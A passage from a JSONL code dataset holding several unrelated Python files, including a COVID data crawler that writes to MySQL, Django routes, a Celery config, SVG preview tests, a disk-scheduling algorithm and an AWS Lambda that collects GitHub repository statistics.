\"UTF-8\"))\n","sub_path":"ircbot.py","file_name":"ircbot.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"257999998","text":"import myparallel as mp\nimport os\nimport glob\nimport argparse\nfrom mylogmsg import logm, logwarn\n\nclass Compare(mp.myparallel):\n\n http_prestr = 'http://172.16.0.171/~liang/'\n\n def __init__(self, **argv):\n super().__init__(**argv)\n\n def setupTaskPool(self, task_pool):\n if not os.path.isdir('clipped'):\n os.makedirs('clipped')\n for fasta_f in sorted(list(glob.glob('*.fasta'))):\n # for fastx_clipper\n fxcn = 'clipped/{:s}_fastxclip_clipped.fasta'.format(fasta_f[:-6])\n task_pool.append(mp.Task(\n name=fasta_f[:-6],\n task_type='fastx_clipper',\n command=[\n 'fastx_clipper',\n '-a', 'TCGTATGCCGTCTTCTGCTTGT',\n '-l', '18',\n '-i', fasta_f, \n '-c', '-v',\n '-o', fxcn,\n ]))\n\n # for cutadapt\n cdpn = 'clipped/{:s}_cutadapt_clipped.fasta'.format(fasta_f[:-6])\n task_pool.append(mp.Task(\n name=fasta_f[:-6],\n task_type='cutadapt',\n command=[\n 'cutadapt',\n '-a', 'TCGTATGCCGTCTTCTGCTTGT',\n '--trimmed-only',\n '-m', '18',\n '-o', cdpn,\n '--untrimmed-output=\\\n clipped/{:s}_cutadapt_notrim.fasta'.format(fasta_f[:-6]),\n fasta_f\n ]))\n\n def output(self, lastTime=False):\n # original output function\n super.output(lastTime)\n\n # link all the ouptput to ~/public_html/log/// \n home_log_dir = os.path.join('~/public_html/log', self.name)\n if not os.path.exists(home_log_dir):\n os.makedirs(home_log_dir)\n sim_dir = os.path.join(home_log_dir, mp.strTime(self.start_time))\n logm('Create symbolic link at for log files at', sim_dir)\n\n abs_logdir = os.path.dirname(os.path.realpath(self.output_filename))\n if os.exists(sim_dir) and not os.path.samefile(sim_dir, abs_logdir):\n if os.path.islink(sim_dir):\n os.rename(sim_dir, sim_dir + '.backup')\n logwarn('link exists. Backup link as {:s}.backup -> {:s}'\n .format(sim_dir,\n os.path.realpath(os.path.expanduser(sim_dir))))\n else:\n os.rename(sim_dir, sim_dir + '.backup') \n logwarn('file or dir exists. Backup as{:s}.backup'\n .format(sim_dir))\n elif not os.exists(sim_dir):\n os.symlink(abs_logdir, mp.strTime(self.start_time), \n target_is_directory=True, dir_fd=home_log_dir)\n \n\ndef makeParser():\n ap = argparse.ArgumentParser\n parser = ap(prog='CLIP_COMP',\n description='Compare different clipping tool',\n parents=[mp.parser])\n return parser\n\ndef run():\n parser = makeParser()\n args = parser.parse_args()\n if args.max_process == 1:\n args.max_process = 0\n Compare(**vars(args))\n\nif __name__ == '__main__':\n run() \n \n","sub_path":"clip_tools_compare.py","file_name":"clip_tools_compare.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"510661458","text":"# encoding=utf8\nfrom django.conf.urls import url\nfrom django.contrib.auth import views as auth_views\n\nfrom . 
import views\n\nurlpatterns = [\n url(r'^login/$', auth_views.login, {'template_name': 'chiffee/login.html'}, name='login'),\n url(r'^logout/$', auth_views.logout, {'next_page': '/'}, name='logout'),\n url(r'^home/$', views.showoverview, name='home'),\n url(r'^money/$', views.showmoney, name='money'),\n url(r'^prod/$', views.showproducts, name='prod'),\n url(r'^history/$', views.showhistory, name='history'),\n url(r'^timeout/$', views.timeout, name='timeout'),\n url(r'^balance/$', views.balance, name='balance'),\n \n \n url(r'^$', views.users, name='index'),\n url(r'^(?P[0-9,a-z,A-Z,\\s]+)/$', views.products, name='products'),\n url(r'^(?P[0-9,a-z,A-Z,\\s]+)/(?P[0-9,a-z,A-Z,\\-,\\.,\\,\\s]+)/$', views.confirm, name='confirm'),\n url(r'^(?P[0-9,a-z,A-Z,\\s]+)/(?P[0-9,a-z,A-Z,\\-,\\.,\\,\\s]+)/(?P[0-9]+)$', views.confirmed, name='confirmed'),\n\n]\n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"266225119","text":"\"\"\"\n@ProjectName: DXY-2019-nCoV-Crawler\n@FileName: script.py\n@Author: Jiabao Lin\n@Date: 2020/1/31\n\"\"\"\nfrom git import Repo\nfrom pymongo import MongoClient\nimport pymysql\nimport os\nimport json\nimport time\nimport logging\nimport datetime\nimport requests\nimport pandas as pd\n\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(message)s')\nlogger = logging.getLogger(__name__)\n\ndb = pymysql.connect(host=\"localhost\", user=\"root\", password=\"\", database=\"yiiPractice\",charset=\"utf8\")\n\n#键是想要保存的文件名,值是对应的url模块\ncollections = {\n 'DXYOverall': 'overall',\n 'DXYArea': 'area',\n 'DXYNews': 'news',\n 'DXYRumors': 'rumors'\n}\n\ntime_types = ('pubDate', 'createTime', 'modifyTime', 'dataInfoTime', 'crawlTime', 'updateTime')\n\n#将document和city_dict中的内容全部导入result字典并且返回\ndef dict_parser(document, city_dict=None):\n result = dict()\n\n try:\n result['continentName'] = document['continentName']\n result['continentEnglishName'] = document['continentEnglishName']\n except KeyError:\n result['continentName'] = None\n result['continentEnglishName'] = None\n\n result['countryName'] = document['countryName']\n\n try:\n result['countryEnglishName'] = document['countryEnglishName']\n except KeyError:\n result['countryEnglishName'] = None\n\n result['provinceName'] = document['provinceName']\n result['provinceEnglishName'] = document.get('provinceEnglishName')\n result['province_zipCode'] = document.get('locationId')\n result['province_confirmedCount'] = document['confirmedCount']\n result['province_suspectedCount'] = document['suspectedCount']\n result['province_curedCount'] = document['curedCount']\n result['province_deadCount'] = document['deadCount']\n\n if city_dict:\n result['cityName'] = city_dict['cityName']\n result['cityEnglishName'] = city_dict.get('cityEnglishName')\n result['city_zipCode'] = city_dict.get('locationId')\n result['city_confirmedCount'] = city_dict['confirmedCount']\n result['city_suspectedCount'] = city_dict['suspectedCount']\n result['city_curedCount'] = city_dict['curedCount']\n result['city_deadCount'] = city_dict['deadCount']\n\n result['updateTime'] = datetime.datetime.fromtimestamp(int(document['updateTime']/1000))\n\n return result\n\n#处理git相关日志消息\ndef git_manager(changed_files):\n repo = Repo(path=os.path.split(os.path.realpath(__file__))[0])\n repo.index.add(changed_files)\n repo.index.commit(message='{datetime} - Change detected!'.format(datetime=datetime.datetime.now()))\n origin = 
repo.remote('origin')\n origin.push()\n logger.info('Pushing to GitHub successfully!')\n\n\nclass DB:\n def __init__(self):\n self.db = db\n self.cursor = db.cursor()\n\n def count(self, collection):\n return self.db[collection].count_documents(filter={})\n\n # def dump(self, collection):\n # return self.db[collection].aggregate(\n # pipeline=[\n # {\n # '$sort': {\n # 'updateTime': -1,\n # 'crawlTime': -1\n # }\n # }\n # ],\n # allowDiskUse=True\n # )\n\n def list_table(self):\n self.cursor.execute(\"show tables\")\n table_list = [tuple[0] for tuple in self.cursor.fetchall()]\n return table_list\n\n\n\nclass Listener:\n def __init__(self):\n self.db = db\n self.cursor=self.db.cursor()\n\n def list_table(self):\n self.cursor.execute(\"show tables\")\n table_list = [tuple[0] for tuple in self.cursor.fetchall()]\n return table_list\n\n def run(self):\n while True:\n self.listener()\n time.sleep(60)\n\n def listener(self):\n changed_files = list()\n tables=self.list_table()\n pos=[0 for i in range(4)]\n for table in tables:\n if table=='migration' or table=='user' or table=='dxyoverall':\n continue\n #将大小写转化成对应格式,即前四个字母大写\n a=table[0].upper()\n b=table[1].upper()\n c=table[2].upper()\n d=table[3].upper()\n e=table[4:]\n table=a+b+c+d+e\n\n\n json_file = open(\n os.path.join(\n os.path.split(os.path.realpath(__file__))[0], 'json', table + '.json'),#这块如果报错可能是因为大小写\n 'r', encoding='utf-8'\n )\n try:\n static_data = json.load(json_file)\n except (UnicodeDecodeError, FileNotFoundError, json.decoder.JSONDecodeError):\n static_data = None\n json_file.close()\n while True:\n str=collections.get(table)\n request = requests.get(url='https://lab.isaaclin.cn/nCoV/api/' + collections.get(table))#此处是爬虫\n if request.status_code == 200:\n current_data = request.json()\n break\n else:\n time.sleep(1)\n continue\n\n #爬虫爬取信息完毕,下面开始导入数据库\n # if static_data != current_data:#数据存在更新\n # self.json_dumper(collection=table, content=current_data)\n # changed_files.append('json/' + table + '.json')\n # self.mysql_dumper(table,current_data)\n if table=='DXYNews':self.mysql_dumper(table, current_data)#如果哪一个表觉得数据不够,可以把这句话取消注释来导入数据\n logger.info('{collection} checked!'.format(collection=table))\n\n # #下面造一个数据进行测试\n # test_data=[{\n # \"pubDate\": \"1591438030000\",\n # \"title\": \"139天!邱海波终于回家了\",\n # \"summary\": \"从严冬到酷暑,从江苏到湖北,再转战黑龙江、吉林,著名重症医学专家、东南大学附属中大医院党委副书记邱海波,抗疫 139 天后,于 6 月 5 日下午从吉林平安返回南京。在他返回的前两天,6 月 3 日,吉林省舒兰市风险等级由高风险调整为低风险。看到邱海波回家,网友纷纷致敬:「辛苦了,好好休息休息!」\",\n # \"infoSource\": \"央视新闻app\",\n # \"sourceUrl\": \"http://app.cctv.com/special/cportal/detail/arti/index.html?id=ArtiTFBarRzB87SoCXeAwJXV200606&isfromapp=1\",\n # \"province\": 'null',\n # \"provinceId\": \"\"\n # }]\n #\n # self.mysql_dumper(table, test_data)\n # if changed_files:\n # git_manager(changed_files=changed_files)\n\n def json_dumper(self, collection, content=None):\n json_file = open(\n os.path.join(\n os.path.split(\n os.path.realpath(__file__))[0], 'json', collection + '.json'\n ),\n 'w', encoding='utf-8'\n )\n json.dump(content, json_file, ensure_ascii=False, indent=4)\n json_file.close()\n\n def csv_dumper(self, collection, cursor):\n if collection == 'DXYArea':#这块之后的大小写要改一下\n structured_results = list()\n for document in cursor:\n if document.get('cities', None):\n for city_counter in range(len(document['cities'])):\n city_dict = document['cities'][city_counter]\n structured_results.append(dict_parser(document=document, city_dict=city_dict))\n else:\n structured_results.append(dict_parser(document=document))\n\n df = 
pd.DataFrame(structured_results)\n df.to_csv(\n path_or_buf=os.path.join(\n os.path.split(os.path.realpath(__file__))[0], 'csv', collection + '.csv'),\n index=False, encoding='utf_8_sig', float_format=\"%i\"\n )\n else:\n df = pd.DataFrame(data=cursor)\n for time_type in time_types:\n if time_type in df.columns:\n df[time_type] = df[time_type].apply(lambda x: datetime.datetime.fromtimestamp(x / 1000) if not pd.isna(x) else '')\n df.to_csv(\n path_or_buf=os.path.join(\n os.path.split(os.path.realpath(__file__))[0], 'csv', collection + '.csv'),\n index=False, encoding='utf_8_sig', date_format=\"%Y-%m-%d %H:%M:%S\"\n )\n\n def db_dumper(self, collection, cursor):\n data = list()#初始化一个列表\n for document in cursor:\n document.pop('_id')\n data.append(document)\n\n json_file = open(\n os.path.join(\n os.path.split(\n os.path.realpath(__file__))[0], 'json', collection + '-TimeSeries.json'\n ),\n 'w', encoding='utf-8'\n )\n json.dump(data, json_file, ensure_ascii=False, indent=4)\n json_file.close()\n\n def mysql_dumper(self,table,da):#current_data是一个json文件,字典套列表套字典\n if table == 'DXYNews':\n sql = \"insert into \" + table + \" values(%s,%s,%s,%s,%s,%s,%s)\"\n for item in da['results']: # 只导最新一条新闻\n value = (item[\"pubDate\"], item[\"title\"], item[\"summary\"], item[\"infoSource\"],\n item[\"sourceUrl\"], item[\"province\"], item[\"provinceId\"])\n self.cursor.execute(sql, value)\n self.db.commit()\n elif table== 'DXYArea':\n sql = \"insert into \" + table + \" values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n for item in da['results']: # 只导最新一条新闻\n value = (item[\"locationId\"], item[\"continentName\"],item[\"continentEnglishName\"], item[\"countryName\"],\n item[\"countryEnglishName\"], item[\"countryFullName\"], item[\"provinceName\"],item[\"provinceEnglishName\"],\n item[\"provinceShortName\"], item[\"currentConfirmedCount\"], item[\"confirmedCount\"], item[\"suspectedCount\"],\n item[\"curedCount\"], item[\"deadCount\"], item[\"comment\"], item[\"cities\"], item[\"updateTime\"])\n self.cursor.execute(sql, value)\n self.db.commit()\n elif table== 'DXYRumors':\n sql = \"insert into \" + table + \" values(%s,%s,%s,%s)\"\n for item in da['results']: # 只导最新一条新闻\n value = (item[\"title\"], item[\"mainSummary\"], item[\"body\"], item[\"sourceUrl\"])\n self.cursor.execute(sql, value)\n self.db.commit()\n\n\n \n \n\n\n\n\nif __name__ == '__main__':\n listener = Listener()\n listener.run()\n","sub_path":"yii/疫情数据爬虫/DXY-COVID-19-Data-master/test1.pyw","file_name":"test1.pyw","file_ext":"pyw","file_size_in_byte":10797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"265259470","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass GalleryImageVersionStorageProfile(Model):\n    \"\"\"This is the storage profile of a gallery Image Version.\n\n    Variables are only populated by the server, and will be ignored when\n    sending a request.\n\n    :ivar os_disk_image:\n    :vartype os_disk_image:\n     ~azure.mgmt.compute.v2019_03_01.models.GalleryOSDiskImage\n    :ivar data_disk_images: A list of data disk images.\n    :vartype data_disk_images:\n     list[~azure.mgmt.compute.v2019_03_01.models.GalleryDataDiskImage]\n    \"\"\"\n\n    _validation = {\n        'os_disk_image': {'readonly': True},\n        'data_disk_images': {'readonly': True},\n    }\n\n    _attribute_map = {\n        'os_disk_image': {'key': 'osDiskImage', 'type': 'GalleryOSDiskImage'},\n        'data_disk_images': {'key': 'dataDiskImages', 'type': '[GalleryDataDiskImage]'},\n    }\n\n    def __init__(self, **kwargs):\n        super(GalleryImageVersionStorageProfile, self).__init__(**kwargs)\n        self.os_disk_image = None\n        self.data_disk_images = None\n","sub_path":"azure-mgmt-compute/azure/mgmt/compute/v2019_03_01/models/gallery_image_version_storage_profile.py","file_name":"gallery_image_version_storage_profile.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"141540811","text":"import os\nfrom celery.schedules import crontab\n\n# This broker acts as a middleman, sending and receiving messages to workers who in turn process tasks as they receive them.\nBROKER_URL = 'amqp://guest:guest@localhost:5672//'\n# Backend is used to keep track of task state and results.\nCELERY_RESULT_BACKEND = 'amqp://guest:guest@localhost:5672//'\nCELERY_ACCEPT_CONTENT = ['pickle', 'json', 'msgpack', 'yaml']\nCELERY_TIMEZONE = 'Europe/Oslo'\nCELERYBEAT_SCHEDULE = {\n    'every-minute': {\n        'task': 'celery_tasks.notifications_strotimer.send_notifications_strotimer_task',\n        # minute='*/60' only matches minute 0, so this fires hourly despite the key name\n        'schedule': crontab(minute='*/60')\n    },\n}\nCELERY_TASK_SERIALIZER = 'json'\nCELERY_RESULT_SERIALIZER = 'json'\nCELERY_ENABLE_UTC = False\n# You can tell celery to run tasks synchronously by adding this;\n# it is only meant to be used for debugging or development stages!\n# Environment variables are strings, so test the value explicitly instead of relying on truthiness.\nif os.environ.get('DEBUG', 'True').lower() in ('1', 'true', 'yes'):\n\tCELERY_ALWAYS_EAGER = True","sub_path":"flod_booking/celeryconfig.py","file_name":"celeryconfig.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"476438685","text":"from typing import List, Tuple\n\n\nfrom components.access_to_disk_.algorithms.algorithm import Algorithm\n\n\nclass FCFS(Algorithm):\n\n    def execute(self) -> Tuple[List[int], int]:\n        \"\"\"\n        Execute FCFS Algorithm\n        :return: queue, rewound cylinders\n        \"\"\"\n        while True:\n            # serve pending real-time requests first, if there are any\n            if self.rt_requests:\n                to_queue = self.rt_requests[0].block\n                self.rt_requests = self.rt_requests[1:]\n            # otherwise serve a normal request\n            elif self.requests:\n                to_queue = self.requests[0].block\n                self.requests = self.requests[1:]\n            # stop once every request has been served\n            else:\n                break\n            self.rewound += self.calculate_rewound(to_queue)\n            self.queue.append(to_queue)\n        return self.queue, self.rewound\n\n    def get_name(self) -> str:\n        return 
\"FCFS\"","sub_path":"Lab5.5/components/access_to_disk_/algorithms/fcfs.py","file_name":"fcfs.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"640601896","text":"# -*- coding: utf8 -*-\nfrom create_cases import list_of_cases_to_find_doubles, fault_cases\nfrom cases import Case, CaseAllEq\nfrom xl_to_add_to_acts import cases_form_xls_from_base\n\n\n# format: {num: [Case Instance, ...]}\ndouble_cases_dic = {}\ndouble_cases = set()\nunique_cases_with_repetitions = set()\n\n# Find unique and double cases from stocktaking.\nfor case in list_of_cases_to_find_doubles:\n    if case in unique_cases_with_repetitions:\n        unique_cases_with_repetitions.remove(case)\n        double_cases.add(case)\n    else:\n        unique_cases_with_repetitions.add(case)\n\nfor case in list_of_cases_to_find_doubles:\n    if case in double_cases:\n        if not isinstance(case.num, dict) and not isinstance(case.year, dict):\n            key = case.num + \"_\" + case.year\n            if key in double_cases_dic:\n                case_from_dic = double_cases_dic[key][0]\n                if not case.is_equal(case_from_dic):\n                    double_cases_dic[key].append(case)\n            else:\n                double_cases_dic[key] = [case]\n\nraw_unique_cases = set([Case(x.num, x.year, x.service, x.region) for x in unique_cases_with_repetitions])\nintersected = raw_unique_cases.intersection(cases_form_xls_from_base)\nunique_cases = raw_unique_cases.union(cases_form_xls_from_base)\n\nfor case in fault_cases:\n    key = case.num + \"_\" + case.year\n    try:\n        list_of_cases = double_cases_dic.pop(key)\n        for case_dub in list_of_cases:\n            case_to_compare = CaseAllEq(case_dub.num, case_dub.year, case_dub.service, case_dub.region)\n            if case_to_compare != case:\n                new_unique_case = Case(case_to_compare.num, case_to_compare.year, case_to_compare.service,\n                                       case_to_compare.region)\n                unique_cases.add(new_unique_case)\n    except KeyError:\n        pass\n        #print \"{0} is already removed from doubles\".format(key)","sub_path":"find_doubles.py","file_name":"find_doubles.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"427102208","text":"from django.conf.urls import url, patterns, include, handler404\nfrom django.http import HttpResponse, HttpResponseNotFound\nfrom django.template import Template, Context\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\n\ndef test_view(request, item_slug):\n    pslug = request.POST['pslug']\n    N = request.POST['N']\n    t = Template('{% load treenav_tags %}{% single_level_menu pslug N %}')\n    c = Context({\n        \"request\": request,\n        \"pslug\": pslug,\n        \"N\": N,\n    })\n    return HttpResponse(t.render(c))\n\n\ndef test_404(request):\n    return HttpResponseNotFound()\n\n\nhandler404 = test_404  # noqa\n\n\nurlpatterns = patterns('',  # noqa\n    url(r'^admin/', include(admin.site.urls)),\n    url(r'^item/(?P<item_slug>[\\\\w-]+)/$', test_view, name='test_view'),\n    url(r'^old/', include('treenav.urls')),\n)\n","sub_path":"treenav/tests/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"487408215","text":"# -*- coding: utf-8 -*-\n\nimport json\nimport os\nimport shutil\nimport typing\n\nfrom PIL import Image\nimport pytest\n\nfrom preview_generator.exception import UnavailablePreviewType\nfrom preview_generator.preview.builder.image__cairosvg import ImagePreviewBuilderCairoSVG\nfrom preview_generator.utils import ImgDims\n\nCURRENT_DIR = 
os.path.dirname(os.path.abspath(__file__))\nCACHE_DIR = \"/tmp/preview-generator-tests/cache/\"\nTEST_FILES = [\n {\n \"name\": \"tesselation-P3.svg\",\n \"width\": 181,\n \"height\": 256,\n \"width_default\": 181,\n \"height_default\": 256,\n },\n {\n \"name\": \"Ghostscript_Tiger.svg\",\n \"width\": 256,\n \"height\": 256,\n \"width_default\": 256,\n \"height_default\": 256,\n },\n {\n \"name\": \"14224-tiger-svg.svg\",\n \"width\": 419,\n \"height\": 256,\n \"width_default\": 256,\n \"height_default\": 156,\n },\n]\n\n\ndef setup_function(function: typing.Callable) -> None:\n shutil.rmtree(CACHE_DIR, ignore_errors=True)\n\n\n@pytest.mark.parametrize(\"file\", TEST_FILES)\ndef test_to_jpeg(file: typing.Dict[str, typing.Any]) -> None:\n os.makedirs(CACHE_DIR)\n builder = ImagePreviewBuilderCairoSVG()\n assert builder.has_jpeg_preview() is True\n size = ImgDims(height=256, width=512)\n preview_name = \"svg_tesselation_test_cairosvg\"\n builder.build_jpeg_preview(\n file_path=os.path.join(CURRENT_DIR, file[\"name\"]),\n size=size,\n page_id=0,\n cache_path=CACHE_DIR,\n preview_name=preview_name,\n )\n path_to_file = os.path.join(CACHE_DIR, \"{}.jpg\".format(preview_name))\n assert os.path.exists(path_to_file) is True\n assert os.path.getsize(path_to_file) > 0\n\n with Image.open(path_to_file) as jpeg:\n assert jpeg.height == file[\"height\"]\n assert jpeg.width == file[\"width\"]\n\n\n@pytest.mark.parametrize(\"file\", TEST_FILES)\ndef test_get_nb_page(file: typing.Dict[str, typing.Any]) -> None:\n os.makedirs(CACHE_DIR)\n builder = ImagePreviewBuilderCairoSVG()\n preview_name = \"svg_tesselation_test_cairosvg\"\n nb_page = builder.get_page_number(\n file_path=os.path.join(CURRENT_DIR, file[\"name\"]),\n cache_path=CACHE_DIR,\n preview_name=preview_name,\n )\n assert nb_page == 1\n\n\n@pytest.mark.parametrize(\"file\", TEST_FILES)\ndef test_to_json(file: typing.Dict[str, typing.Any]) -> None:\n os.makedirs(CACHE_DIR)\n builder = ImagePreviewBuilderCairoSVG()\n preview_name = \"svg_tesselation_test_cairosvg\"\n assert builder.has_json_preview() is True\n builder.build_json_preview(\n file_path=os.path.join(CURRENT_DIR, file[\"name\"]),\n cache_path=CACHE_DIR,\n preview_name=preview_name,\n )\n path_to_file = os.path.join(CACHE_DIR, \"{}.json\".format(preview_name))\n\n assert os.path.exists(path_to_file)\n assert os.path.getsize(path_to_file) > 0\n\n data = json.load(open(path_to_file))\n assert \"File:FileName\" in data.keys()\n assert \"SVG:Xmlns\" in data.keys()\n assert \"File:FileTypeExtension\" in data.keys()\n assert \"SourceFile\" in data.keys()\n assert \"File:FileInodeChangeDate\" in data.keys()\n assert \"File:Directory\" in data.keys()\n assert \"File:FileAccessDate\" in data.keys()\n assert \"ExifTool:ExifToolVersion\" in data.keys()\n assert \"File:FileSize\" in data.keys()\n assert \"File:FilePermissions\" in data.keys()\n assert \"File:FileModifyDate\" in data.keys()\n assert \"File:FileType\" in data.keys()\n assert \"File:MIMEType\" in data.keys()\n\n\n@pytest.mark.parametrize(\"file\", TEST_FILES)\ndef test_to_pdf(file: typing.Dict[str, typing.Any]) -> None:\n os.makedirs(CACHE_DIR)\n builder = ImagePreviewBuilderCairoSVG()\n preview_name = \"svg_tesselation_test_cairosvg\"\n assert builder.has_pdf_preview() is True\n builder.build_pdf_preview(\n file_path=os.path.join(CURRENT_DIR, file[\"name\"]),\n cache_path=CACHE_DIR,\n preview_name=preview_name,\n )\n path_to_file = os.path.join(CACHE_DIR, \"{}.pdf\".format(preview_name))\n assert os.path.exists(path_to_file)\n assert 
os.path.getsize(path_to_file) > 0\n\n\n@pytest.mark.parametrize(\"file\", TEST_FILES)\ndef test_to_text(file: typing.Dict[str, typing.Any]) -> None:\n    os.makedirs(CACHE_DIR)\n    builder = ImagePreviewBuilderCairoSVG()\n    preview_name = \"svg_tesselation_test_cairosvg\"\n    assert builder.has_text_preview() is False\n    with pytest.raises(UnavailablePreviewType):\n        builder.build_text_preview(\n            file_path=os.path.join(CURRENT_DIR, file[\"name\"]),\n            cache_path=CACHE_DIR,\n            preview_name=preview_name,\n        )\n","sub_path":"tests/input/svg/test_svg_cairosvg.py","file_name":"test_svg_cairosvg.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"143875577","text":"from test06 import dataset\nfrom torch.utils import data\nimport torch\nimport torchvision\nfrom PIL import Image,ImageDraw\nfrom myNet import Net\nfrom torch.utils import data\nimport torch.nn as nn\nimport numpy as np\nif __name__ == '__main__':\n    data_set = dataset(\"test_pic2\")\n    # shuffle disrupts the ordering between samples\n    # batch_size: how much data is taken at once; here 100 images per batch\n    # use a data loader to take shuffled data from the dataset\n    train_data=data.DataLoader(dataset=data_set,batch_size=100\n                               ,shuffle=True)\n\n    #net = Net()\n    net = torch.load(\"1.pth\")\n    # compute the loss function\n    loss_func = nn.MSELoss()\n    # optimize all the parameters with gradient descent; lr: step size\n    # optimizer = torch.optim.SGD(net.parameters(),lr=0.01)\n    # optimizer = torch.optim.Adam(net.parameters())\n    for epoch in range(1000):\n        # use enumerate to obtain the index\n        # x: data, y: labels\n        for i, (x, y) in enumerate(train_data):\n            # reshape x into one dimension (e.g. 28*28 becomes 784)\n\n            x = x.view(-1, 300*300*3)  # -1 stands for the remaining part\n            out = net(x)\n            # turn the labels into one-hot form\n            x = x.view(-1, 300,300, 3)\n            out=out.detach().numpy()*300\n            y =y.detach().numpy()*300\n            print(out[0])\n            img_data = np.array((x[0]+0.5)*255,dtype=np.int8)\n            img = Image.fromarray(img_data,\"RGB\")\n            draw = ImageDraw.Draw(img)\n            draw.rectangle(out[0],outline=\"red\",width=2)\n            draw.rectangle(y[0], outline=\"green\", width=2)\n            print(y[0])\n            img.show()\n\n            # # pass in the loss\n            # loss = loss_func(out, y)\n            #\n            # # gradient descent steps\n            # optimizer.zero_grad()  # clear the gradients\n            # loss.backward()  # automatic differentiation\n            # optimizer.step()  # update the gradients\n\n            # if i % 10 == 0:\n            #     # out_put = torch.argmax(out, dim=1)\n            #     print(loss)\n            #\n            #     # print(\"target:\",target)\n            #     # print(\"out:\",out_put)\n            #     acc = np.mean(np.sum(out.detach().numpy()==y.numpy(),axis=1)==4);\n            #     print(acc)\n            # torch.save(net, \"1.pth\")","sub_path":"location-to-man/test07.py","file_name":"test07.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"603711497","text":"\"\"\"\nThis is a sample script which connects to a GitHub account via the PyGithub library using a token, collects repository details into a csv file and stores/appends the csv file on the AWS bucket.\n\"\"\"\nimport boto3, csv, datetime, pytz\nfrom github_module_methods.repo_stats import Repo_Stat\nimport conf.git_stat_conf as conf\n\n\n#----START OF SCRIPT in Lambda function---\ndef lambda_handler(event, context):\n    s3 = boto3.client('s3')\n\n    #Collecting paths and bucket name from conf file\n    global lambda_temp_file\n    lambda_temp_file = conf.lambda_temp_file\n    my_s3_bucket = conf.s3_bucket_name\n    s3_csv_file = conf.s3_csv_file\n\n    #Download s3 csv file to lambda tmp folder. If the csv does not exist in s3, create a csv file in the temp folder\n    response = s3.list_objects_v2(Bucket=my_s3_bucket, Prefix=s3_csv_file)\n    if response.get('Contents'):\n        s3.download_file(my_s3_bucket, s3_csv_file, lambda_temp_file)\n    else:\n        csv.writer(open(lambda_temp_file, \"w+\"))\n\n    #Creating an instance of the class\n    test_obj = Repo_Stat(conf.token)\n    repositories = conf.repositories\n\n    #Converting GMT date time to IST date time since the lambda function uses GMT time standard\n    date = datetime.datetime.today()\n    zone = pytz.timezone('Asia/Kolkata')\n    date_ist = date.astimezone(zone)\n    today_date = date_ist.strftime(\"%Y-%m-%d\")\n    date_time = date_ist.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n    #Opening csv file from lambda tmp folder.\n    with open(lambda_temp_file, 'a+', newline='') as f:\n        write = csv.writer(f, delimiter=',')\n\n        #If header row is not available, write the header row.\n        if f.tell() == 0:\n            write.writerow(['Repository', 'Date', 'Starts', 'Forks', 'Today\'s Clones', 'Today\'s Unique Clones', 'Today\'s Views', 'Today\'s Unique Visitors', 'Fortnight Clones', 'Fortnight Unique Clones', 'Fortnight Views', 'Fortnight unique Views'])\n\n        for repository in repositories:\n            stars = test_obj.get_repo_stars(repository)\n            forks = test_obj.get_repo_forks(repository)\n            clone_dict, clone_count, unique_clone_count = test_obj.get_repo_clone(repository, today_date)\n            visitors_dict, view_count, unique_visitors = test_obj.get_repo_views(repository, today_date)\n\n            #Writing the collected values to csv file\n            write.writerow([repository, date_time, stars, forks, clone_count, unique_clone_count, view_count, unique_visitors, clone_dict['count'], clone_dict['uniques'], visitors_dict['count'], visitors_dict['uniques']])\n\n    #Upload the lambda temp file to s3 bucket\n    s3.upload_file(lambda_temp_file, my_s3_bucket, s3_csv_file)\n\n    return {\n        'message': 'success!!'\n    }","sub_path":"test_to_run_on_lambda_funtion/collect_git_repo_stats_via_lambda.py","file_name":"collect_git_repo_stats_via_lambda.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
